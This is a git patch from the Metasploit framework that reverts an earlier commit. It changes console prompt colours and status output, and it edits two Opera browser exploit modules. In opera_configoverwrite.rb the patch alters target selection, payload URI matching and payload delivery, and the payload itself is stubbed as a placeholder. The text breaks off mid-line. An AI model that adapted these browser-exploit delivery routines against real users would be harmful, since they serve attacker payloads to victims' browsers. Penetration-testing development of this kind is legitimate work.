From bd2da7c12a8564aba79be6ea17a8cb10ecfcd52e Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 18 Aug 2009 04:53:35 +0000 Subject: [PATCH] revert overzealous commit git-svn-id: file:///home/svn/framework3/trunk@6961 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/payload/generic.rb | 1 - lib/msf/ui/console/command_dispatcher/core.rb | 4 +- lib/msf/ui/console/driver.rb | 2 +- lib/rex/ui/text/shell.rb | 2 +- .../multi/browser/opera_configoverwrite.rb | 71 +++++------ .../multi/browser/opera_historysearch.rb | 120 ++++++------------ 6 files changed, 73 insertions(+), 127 deletions(-) diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index f47afd44bc..c7d716d3c4 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -231,7 +231,6 @@ protected raise NoCompatiblePayloadError, "Could not locate a compatible payload for #{actual_platform.names.join("/")}/#{actual_arch}" else dlog("Selected payload #{actual_payload.refname} from generic payload #{refname}", 'core', LEV_2) - print_status("Selected payload #{actual_payload.refname} from generic payload #{refname}") # Share our datastore with the actual payload so that it has the # appropriate values to substitute ad so on. self.actual_payload.share_datastore(self.datastore) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 362101c6c1..f4ce92065f 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1442,7 +1442,7 @@ class Core mod.init_ui(driver.input, driver.output) # Update the command prompt - driver.update_prompt("%c%cya#{mod.type}%c(%b%red#{mod.shortname}%c) ") + driver.update_prompt("#{mod.type}(#{mod.shortname}) ") end # @@ -1745,7 +1745,7 @@ protected def show_options(mod) # :nodoc: mod_opt = Serializer::ReadableText.dump_options(mod, ' ') - print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) + print("\nModule options:\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) # If it's an exploit and a payload is defined, create it and # display the payload's options diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 2099616a93..2c1e43a7d3 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -21,7 +21,7 @@ class Driver < Msf::Ui::Driver ConfigCore = "framework/core" ConfigGroup = "framework/ui/console" - DefaultPrompt = "%u%whimsf%c" + DefaultPrompt = "%umsf" DefaultPromptChar = ">%c" # diff --git a/lib/rex/ui/text/shell.rb b/lib/rex/ui/text/shell.rb index 96c9ccfd9d..a59160eeae 100644 --- a/lib/rex/ui/text/shell.rb +++ b/lib/rex/ui/text/shell.rb @@ -160,12 +160,12 @@ module Shell # Substitute colors new_prompt.gsub!(/%u/, colorize('underline')) new_prompt.gsub!(/%b/, colorize('bold')) - new_prompt.gsub!(/%cya/, colorize('cyan')) new_prompt.gsub!(/%c/, colorize('clear')) new_prompt.gsub!(/%red/, colorize('red')) new_prompt.gsub!(/%grn/, colorize('green')) new_prompt.gsub!(/%blu/, colorize('blue')) new_prompt.gsub!(/%yel/, colorize('yellow')) + new_prompt.gsub!(/%cya/, colorize('cyan')) new_prompt.gsub!(/%whi/, colorize('white')) new_prompt.gsub!(/%mag/, colorize('magenta')) new_prompt.gsub!(/%blk/, colorize('black')) diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 6ead6b1aaf..d0f49accc5 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Opera < 9.10 Windows', - { - 'Platform' => 'win', - 'Arch' => ARCH_X86, - } - ], + #[ 'Opera < 9.10 Windows', + # { + # 'Platform' => 'win', + # 'Arch' => ARCH_X86, + # } + #], [ 'Opera < 9.10 Unix Cmd', { 'Platform' => 'unix', @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, request) case request.uri - when /payload/ + when /payload$/ print_status("Generating payload for #{target} #{target.platform}") # Re-generate the payload if ((p = regenerate_payload(cli)) == nil) @@ -86,10 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_not_found(cli) return end - content = Msf::Util::EXE.to_win32pe_vbs(p.encoded) + # NOTE: Change this to the new API when commiting to trunk + #content = Msf::Util::EXE.to_win32pe(p.encoded) + #content = Rex::Text.to_win32pe(p.encoded) + content = "foo" print_status("Generated #{content.length} bytes") - #headers = { 'Content-Type' => 'application/octet-stream' } - headers = { 'Content-Type' => 'text/html' } + headers = { 'Content-Type' => 'application/octet-stream' } when get_resource print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") content = "